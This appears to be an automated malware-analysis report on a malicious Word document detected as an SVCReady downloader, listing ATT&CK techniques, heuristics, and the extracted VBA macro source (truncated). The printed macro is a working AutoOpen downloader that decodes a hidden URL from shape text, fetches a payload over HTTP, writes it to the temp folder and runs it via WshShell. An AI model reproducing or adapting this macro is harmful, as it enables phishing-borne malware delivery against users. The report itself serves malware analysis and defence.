MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro is designed to download and execute a second-stage payload, as indicated by the use of Shell execution and the construction of a temporary file path '%tmp%\main.theme'. The external relationship to 'file:///C:\Framework\rels\builds\pack2\us.jpg' and the presence of the AutoOpen macro strongly suggest a spearphishing attachment delivery vector.
Heuristics 7
-
ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
-
External relationship high OOXML_EXTERNAL_RELExternal target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\us.jpg
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
- http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
- http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
- http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
- http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4455 bytes |
SHA-256: c700a3c930b07ca3c6082f8bb68fb157c8f46d5beb316f874fb87faa54f10bc5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "d99a1ca5"
Function a733d386()
a733d386 = Application.ActiveDocument.Content
End Function
Function ba9c06fe()
ba9c06fe = ActiveWindow.DisplayScreenTips
End Function
Function c408892d()
c408892d = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function f6b1d6cd()
f6b1d6cd = Application.ActiveDocument.AutoSaveOn
End Function
Sub AutoOpen()
Dim c4df9c00 As New b77b79bf
aaa = a1564d4e(a03bb677)
b5077ec9 = c4df9c00.d21ac916(aaa, "")
d69e39f7 c6ece1c8, b5077ec9
f10f67a7 = a1564d4e(ActiveDocument.Shapes(1).Title)
Dim a0d73b7c As New WshShell
a0d73b7c.exec "" & f10f67a7 & " " & c6ece1c8
End Sub
Attribute VB_Name = "f05c3c7e"
Function f532ce66()
f532ce66 = ActiveWindow.Selection
End Function
Function b830af92()
b830af92 = Application.ActiveDocument.AutoSaveOn
End Function
Function a9f1409d(f1e34e6d As Long) As Long
Dim ee98be7d As Integer
For ee98be7d = 39 To 81 Step 4
f1e34e6d = f1e34e6d + ee98be7d
Next ee98be7d
a9f1409d = f1e34e6d
End Function
Function d2e2a69f()
d2e2a69f = ActiveWindow.DisplayVerticalScrollBar
End Function
Sub d69e39f7(d7d946c2, be5b76a6)
Dim d567869a
d567869a = FreeFile
Open d7d946c2 For Output As #d567869a
Print #d567869a, c76ac9c2(be5b76a6)
Close #d567869a
End Sub
Function c6ece1c8()
c6ece1c8 = Environ("tmp") & "\main.theme"
End Function
Function b6faf152()
b6faf152 = -1125
End Function
Function b63f77a2()
b63f77a2 = ActiveWindow.Type
End Function
Function d3282763()
d3282763 = 0
End Function
Function c4f3a4bf(ac22e227 As Long) As Long
Dim c4eaa279 As Integer
For c4eaa279 = 36 To 75
ac22e227 = ac22e227 + c4eaa279
Next c4eaa279
c4f3a4bf = ac22e227
End Function
Function a1564d4e(e0750ab5)
For eb4e509c = 1 To Len(e0750ab5) Step 3
dedeee31 = Mid(e0750ab5, eb4e509c, 1)
cf2857b2 = cf2857b2 & dedeee31
Next
a1564d4e = cf2857b2
End Function
Function b4f7f4e2()
b4f7f4e2 = 817789830 / 16511
End Function
Function e4b7eae4()
e4b7eae4 = Application.ActiveDocument.Creator
End Function
Function f0f8eaff(e1256506np As String) As Boolean
If Len(e1256506np) < 266 - 145 Then
f0f8eaff = True
End If
End Function
Function de325786()
de325786 = ActiveWindow.Document
End Function
Sub ed5e37b6()
End Sub
Function d10b81e2()
d10b81e2 = ActiveWindow.Creator
End Function
Function c4ab86fb()
c4ab86fb = 562 - 16
End Function
Function b530bf01()
b530bf01 = Application.ActiveDocument.ActiveTheme
End Function
Function be45e2ca()
be45e2ca = -1425425708
End Function
Function c76ac9c2(be5b76a6)
c76ac9c2 = StrConv(be5b76a6, 64)
End Function
Function b951e2d2()
b951e2d2 = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function d44208c0()
d44208c0 = Application.ActiveDocument.ActiveWindow
End Function
Function fe1548c0()
fe1548c0 = ActiveWindow.DisplayVerticalScrollBar
End Function
Function a662018c()
a662018c = 60087.184817971
End Function
Function a03bb677()
a03bb677 = ActiveDocument.Shapes(1).AlternativeText
End Function
Attribute VB_Name = "b77b79bf"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function ec990895()
ec990895 = Application.ActiveDocument.AutoHyphenation
End Function
Function c2d6631b()
c2d6631b = ActiveWindow.StyleAreaWidth
End Function
Function dd5670db()
dd5670db = ActiveWindow.DisplayLeftScrollBar
End Function
Function d64b2607()
d64b2607 = ActiveWindow.Parent
End Function
Function d21ac916(bc692595, b53585d6)
Dim b3d025b9 As Object
Set b3d025b9 = New MSXML2.XMLHTTP60
Call b3d025b9.Open("GET", bc692595, False)
b3d025b9.Send
d21ac916 = b3d025b9.
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 27648 bytes |
SHA-256: 6b9a0ef173ddc77650a04e71ad6c31dbe6f83d3375a7495f0eb2ff8ffd977906 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.